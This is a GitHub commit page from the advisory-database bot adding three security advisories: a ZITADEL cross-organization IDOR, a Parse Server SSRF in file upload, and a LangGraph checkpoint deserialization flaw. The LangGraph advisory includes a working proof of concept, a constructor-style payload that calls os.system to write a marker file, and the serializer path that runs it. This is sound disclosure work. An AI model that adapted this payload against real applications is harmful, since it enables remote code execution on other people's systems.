Skip to content

Commit 6f1b17b

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-cpf4-pmr4-w6cx GHSA-wwqv-p2pp-99h5 GHSA-x4qj-2f4q-r4rx
1 parent 8856624 commit 6f1b17b

File tree

3 files changed

+243
-0
lines changed

3 files changed

+243
-0
lines changed

advisories/github-reviewed/2025/11/GHSA-cpf4-pmr4-w6cx/GHSA-cpf4-pmr4-w6cx.json

Lines changed: 85 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,85 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cpf4-pmr4-w6cx",
4+
"modified": "2025-11-05T19:52:01Z",
5+
"published": "2025-11-05T19:52:01Z",
6+
"aliases": [],
7+
"summary": "IDOR Vulnerabilities in ZITADEL's Organization API allows Cross-Tenant Data Tempering",
8+
"details": "### Summary\n\nZITADEL's Organization V2Beta API contains Insecure Direct Object Reference (IDOR) vulnerabilities that allow authenticated users with specific **administrator** roles within one organization to access and modify data belonging to **other** organizations.\n\n### Impact\n\nZITADEL's Organization V2Beta API, intended for managing ZITADEL organizations, contains multiple endpoints that fail to properly authorize authenticated users. An attacker with an administrator role for a specific organization could exploit this to bypass access controls and perform unauthorized actions on other organizations within the same ZITADEL instance.\n\nThis could allow an attacker to:\n\n- **Read** organization data, including the name, domains and metadata.\n- **Manipulate** (modify) the corresponding organization data.\n- **Delete** the corresponding data, up to and including the entire organization.\n\nNote that this vulnerability is limited to organization-level data (name, domains, metadata). **No other related data (such as users, projects, applications, etc.) is affected.**\n\n### Affected Versions\n\nSystems running one of the following versions are affected:\n- **v4.x**: `4.0.0-rc.1` through `4.6.2`\n\n### Patches\n\nThe vulnerability has been addressed in the latest release. The patch resolves the issue by correctly validating the caller's permission against the target organization.\n\n- v4.x: Upgrade to version [4.6.3](https://github.com/zitadel/zitadel/releases/tag/v4.6.3) or later.\n\n### Workarounds\n\nUpgrading to a patched version is the recommended solution.\n\nIf an immediate upgrade is not possible, mitigation can be achieved by disabling the affected Organization V2Beta API endpoints (e.g., /v2beta/organizations/...) at a reverse proxy or Web Application Firewall (WAF) level.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [[email protected]](mailto:[email protected])",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/zitadel/zitadel"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "4.0.0-rc.1"
27+
},
28+
{
29+
"fixed": "4.6.3"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "< 4.6.2"
36+
}
37+
},
38+
{
39+
"package": {
40+
"ecosystem": "Go",
41+
"name": "github.com/zitadel/zitadel"
42+
},
43+
"ranges": [
44+
{
45+
"type": "ECOSYSTEM",
46+
"events": [
47+
{
48+
"introduced": "1.80.0-v2.20.0.20250414095945-f365cee73242"
49+
},
50+
{
51+
"fixed": "1.80.0-v2.20.0.20251105083648-8dcfff97ed52"
52+
}
53+
]
54+
}
55+
]
56+
}
57+
],
58+
"references": [
59+
{
60+
"type": "WEB",
61+
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-cpf4-pmr4-w6cx"
62+
},
63+
{
64+
"type": "WEB",
65+
"url": "https://github.com/zitadel/zitadel/commit/8dcfff97ed52a8b9fc77ecb1f972744f42cff3ed"
66+
},
67+
{
68+
"type": "PACKAGE",
69+
"url": "https://github.com/zitadel/zitadel"
70+
},
71+
{
72+
"type": "WEB",
73+
"url": "https://github.com/zitadel/zitadel/releases/tag/v4.6.3"
74+
}
75+
],
76+
"database_specific": {
77+
"cwe_ids": [
78+
"CWE-639"
79+
],
80+
"severity": "HIGH",
81+
"github_reviewed": true,
82+
"github_reviewed_at": "2025-11-05T19:52:01Z",
83+
"nvd_published_at": null
84+
}
85+
}

advisories/github-reviewed/2025/11/GHSA-wwqv-p2pp-99h5/GHSA-wwqv-p2pp-99h5.json

Lines changed: 67 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,67 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-wwqv-p2pp-99h5",
4+
"modified": "2025-11-05T19:52:50Z",
5+
"published": "2025-11-05T19:52:50Z",
6+
"aliases": [],
7+
"summary": "LangGraph Checkpoint affected by RCE in \"json\" mode of JsonPlusSerializer ",
8+
"details": "# Summary\n\nPrior to `langgraph-checkpoint` version `3.0` , LangGraph’s `JsonPlusSerializer` (used as the default serialization protocol for all checkpointing) contains a remote code execution (RCE) vulnerability when deserializing payloads saved in the `\"json\"` serialization mode.\n\nIf an attacker can cause your application to persist a payload serialized in this mode, they may be able to also send malicious content that executes arbitrary Python code during deserialization.\n\nUpgrading to version langgraph-checkpoint `3.0` patches this vulnerability by preventing deserialization of custom objects saved in this mode.\n\nIf you are deploying in `langgraph-api`, any version `0.5` or later is also free of this vulnerability. \n\n# Details\n\n**Affected file / component**\n\n[jsonplus.py](https://github.com/langchain-ai/langgraph/blob/c5744f583b11745cd406f3059903e17bbcdcc8ac/libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py)\n\nBy default, the serializer attempts to use `\"msgpack\"` for serialization. However, prior to version `3.0` of the checkpointer library, if illegal Unicode surrogate values caused serialization to fail, it would fall back to using the `\"json\"` mode.\n\nWhen operating in this mode, the deserializer supports a constructor-style format (`lc == 2`, `type == \"constructor\"`) for custom objects to allow them to be reconstructed at load time. If an attacker is able to trigger this mode with a malicious payload, deserializing allow the attacker to execute arbitrary functions upon load.\n\n---\n\n# Who is affected\n\nThis issue affects all users of `langgraph-checkpoint` **versions earlier than 3.0** who:\n\n1. Allow untrusted or user-supplied data to be persisted into checkpoints, and\n2. Use the default serializer (or explicitly instantiate `JsonPlusSerializer`) that may fall back to `\"json\"` mode.\n\nIf your application only processes trusted data or does not allow untrusted checkpoint writes, the practical risk is reduced.\n\n# Proof of Concept (PoC)\n\n```python\nfrom langgraph.graph import StateGraph \nfrom typing import TypedDict\nfrom langgraph.checkpoint.sqlite import SqliteSaver\n\nclass State(TypedDict):\n foo: str\n attack: dict\n\ndef my_node(state: State):\n return {\"foo\": \"oops i fetched a surrogate \\ud800\"}\n\nwith SqliteSaver.from_conn_string(\"foo.db\") as saver:\n graph = (\n\t StateGraph(State).\n\t add_node(\"my_node\", my_node).\n\t add_edge(\"__start__\", \"my_node\").\n\t compile(checkpointer=saver)\n\t )\n \n\n attack = {\n \"lc\": 2,\n \"type\": \"constructor\",\n \"id\": [\"os\", \"system\"],\n \"kwargs\": {\"command\": \"echo pwnd you > /tmp/pwnd.txt\"},\n }\n malicious_payload = {\n \"attack\": attack,\n }\n\n thread_id = \"00000000-0000-0000-0000-000000000001\"\n config = {\"thread_id\": thread_id}\n # Malicious payload is saved in the first call\n graph.invoke(malicious_payload, config=config)\n\n # Malicious payload is deserialized and code is executed in the second call\n graph.invoke({\"foo\": \"hi there\"}, config=config)\n\n```\n\nRunning this PoC writes a file `/tmp/pwnd.txt` to disk, demonstrating code execution.\n\nInternally, this exploits the following code path:\n\n```python\nfrom langgraph.checkpoint.serde.jsonplus import JsonPlusSerializer\n\nserializer = JsonPlusSerializer() # Used within the checkpointer\n\nserialized = serializer.dumps_typed(malicious_payload)\nserializer.loads_typed(serialized) # Executes os.system(...)\n\n```\n\n---\n\n# Fixed Version\n\nThe vulnerability is fixed in **`langgraph-checkpoint==3.0.0`**\n\nRelease link: https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D3.0.0\n\n---\n\n# Fix Description\n\nThe fix introduces an **allow-list** for constructor deserialization, restricting permissible `\"id\"` paths to explicitly approved module/class combinations provided at serializer construction.\n\nAdditionally, saving payloads in `\"json\"` format has been deprecated to remove this unsafe fallback path.\n\n---\n\n# Mitigation\n\nUpgrade immediately to `langgraph-checkpoint==3.0.0`.\n\nThis version is fully compatible with `langgraph>=0.3` and does **not** require any import changes or code modifications.\n\nIn `langgraph-api`, updating to `0.5` or later will automatically require the patched version of the checkpointer library.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "PyPI",
19+
"name": "langgraph-checkpoint"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "3.0.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-wwqv-p2pp-99h5"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/langchain-ai/langgraph/commit/c5744f583b11745cd406f3059903e17bbcdcc8ac"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/langchain-ai/langgraph"
48+
},
49+
{
50+
"type": "WEB",
51+
"url": "https://github.com/langchain-ai/langgraph/blob/c5744f583b11745cd406f3059903e17bbcdcc8ac/libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py"
52+
},
53+
{
54+
"type": "WEB",
55+
"url": "https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D3.0.0"
56+
}
57+
],
58+
"database_specific": {
59+
"cwe_ids": [
60+
"CWE-502"
61+
],
62+
"severity": "HIGH",
63+
"github_reviewed": true,
64+
"github_reviewed_at": "2025-11-05T19:52:50Z",
65+
"nvd_published_at": null
66+
}
67+
}

advisories/github-reviewed/2025/11/GHSA-x4qj-2f4q-r4rx/GHSA-x4qj-2f4q-r4rx.json

Lines changed: 91 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,91 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-x4qj-2f4q-r4rx",
4+
"modified": "2025-11-05T19:52:27Z",
5+
"published": "2025-11-05T19:52:27Z",
6+
"aliases": [],
7+
"summary": "Parse Server Vulnerable to Server-Side Request Forgery (SSRF) in File Upload via URI Format",
8+
"details": "### Impact\n\nA Server-Side Request Forgery (SSRF) vulnerability in the file upload functionality when trying to upload a `Parse.File` with `uri` parameter allows to execute an arbitrary URI. The vulnerability stems from a file upload feature in which Parse Server retrieves the file data from a URI that is provided in the request. A request to the provided URI is executed, but the response is not stored in Parse Server's file storage as the server crashes upon receiving the response.\n\n### Patches\n\nThe feature has been implemented in Parse Server 4.2.0 but never worked and reliably crashes the server when trying to use it due to a bug in its implementation. Since the feature is not currently working, and due to its risky nature, it has been removed to address the vulnerability.\n\n### Workarounds\n\nNone.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "parse-server"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "4.2.0"
27+
},
28+
{
29+
"fixed": "7.5.4"
30+
}
31+
]
32+
}
33+
]
34+
},
35+
{
36+
"package": {
37+
"ecosystem": "npm",
38+
"name": "parse-server"
39+
},
40+
"ranges": [
41+
{
42+
"type": "ECOSYSTEM",
43+
"events": [
44+
{
45+
"introduced": "8.0.0"
46+
},
47+
{
48+
"fixed": "8.4.0-alpha.2"
49+
}
50+
]
51+
}
52+
],
53+
"database_specific": {
54+
"last_known_affected_version_range": "<= 8.4.0-alpha.1"
55+
}
56+
}
57+
],
58+
"references": [
59+
{
60+
"type": "WEB",
61+
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-x4qj-2f4q-r4rx"
62+
},
63+
{
64+
"type": "WEB",
65+
"url": "https://github.com/parse-community/parse-server/pull/9903"
66+
},
67+
{
68+
"type": "WEB",
69+
"url": "https://github.com/parse-community/parse-server/pull/9904"
70+
},
71+
{
72+
"type": "WEB",
73+
"url": "https://github.com/parse-community/parse-server/commit/8bbe3efbcf4a3b66f4a8db9bfb18cd98c050db51"
74+
},
75+
{
76+
"type": "WEB",
77+
"url": "https://github.com/parse-community/parse-server/commit/97763863b72689a29ad7a311dfb590c3e3c50585"
78+
},
79+
{
80+
"type": "PACKAGE",
81+
"url": "https://github.com/parse-community/parse-server"
82+
}
83+
],
84+
"database_specific": {
85+
"cwe_ids": [],
86+
"severity": "HIGH",
87+
"github_reviewed": true,
88+
"github_reviewed_at": "2025-11-05T19:52:27Z",
89+
"nvd_published_at": null
90+
}
91+
}

0 commit comments

Comments
 (0)